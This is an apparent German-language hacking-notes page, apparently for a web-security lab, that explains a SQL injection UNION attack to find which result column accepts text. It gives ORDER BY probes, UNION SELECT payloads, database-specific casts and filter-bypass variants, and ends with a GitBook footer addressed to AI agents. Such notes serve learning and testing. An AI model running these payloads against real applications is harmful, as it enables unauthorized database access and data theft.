> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/sql-injection/union-attack-to-find-a-text-compatible-column.md).

# UNION-Angriff, um eine textkompatible Spalte zu finden

### SQL-Injection-UNION-Angriff, Finden einer Spalte, die Text enthält

**Ziel:** füge ein `UNION` Zeile mit dem Testwert (`PjNkGQ`) ein, um zu identifizieren, welche Spalte Zeichenketten akzeptiert, und extrahiere dann Textdaten.

#### (1) Bestätige die Anzahl der Spalten (falls noch nicht bekannt)

* Teste mit `ORDER BY` schrittweise:

  ```sql
  ' ORDER BY 1-- -
  ' ORDER BY 2-- -
  ' ORDER BY 3-- -
  ```

Wenn `ORDER BY N` einen Fehler verursacht, ist die Anzahl der Spalten `< N`.

#### 2) Injiziere eine `UNION` Zeile mit dem angegebenen Wert

* Beispiel für **3 Spalten**:

  ```sql
  ' UNION SELECT NULL, 'PjNkGQ', NULL-- -
  ```

— wenn die Antwort zeigt `PjNkGQ`, dann wird das **2. Spalte** ist mit Text kompatibel.

#### 3) Varianten zum Lokalisieren der sichtbaren Spalte

* Teste die Konstante in jeder Position:

  ```sql
  ' UNION SELECT 'PjNkGQ', NULL, NULL-- -
  ' UNION SELECT NULL, NULL, 'PjNkGQ'-- -
  ```
* Verwende separate Konstanten, um sichtbare Spalten zuzuordnen:

  ```sql
  ' UNION SELECT 'A','B','C'-- -
  ```

#### (4) Behandle Typfehler

* Wenn `UNION` bei Typinkompatibilität fehlschlägt, verwende `NULL` für Nicht-Text-Spalten oder caste die Konstante gemäß der GBD:
* **MySQL / PostgreSQL**:

  ````
  ```sql
  ' UNION SELECT NULL, CAST('PjNkGQ' AS CHAR), NULL-- -
  ```
  ````

  * **MSSQL** :

    ```sql
    ' UNION SELECT NULL, CAST('PjNkGQ' AS VARCHAR(8000)), NULL-- -
    ```
  * **Oracle** :

    ```sql
    ' UNION SELECT NULL, TO_CHAR('PjNkGQ'), NULL-- -
    ```
* Wenn einige Spalten numerische Typen erfordern, lass `NULL` für sie leer und platziere den Text nur in der Kandidatenspalte.

#### 5) Wenn eine WAF / ein Filter blockiert `UNION`

* Variiere Kommentar / Abstände: `-- -`, `--`, `/*... */`.
* Baue die Kette über Funktionen auf (z. B. `CONCAT('P','jNkGQ')`) um die strenge Normalisierung zu umgehen.

#### (6) Erwartetes Ergebnis

* Die Antwort enthält `PjNkGQ` → Textspalte identifiziert. Von dort aus baue `UNION SELECT` für die Aufzählung (Tabellen/Spalten/Dumps).


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/sql-injection/union-attack-to-find-a-text-compatible-column.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
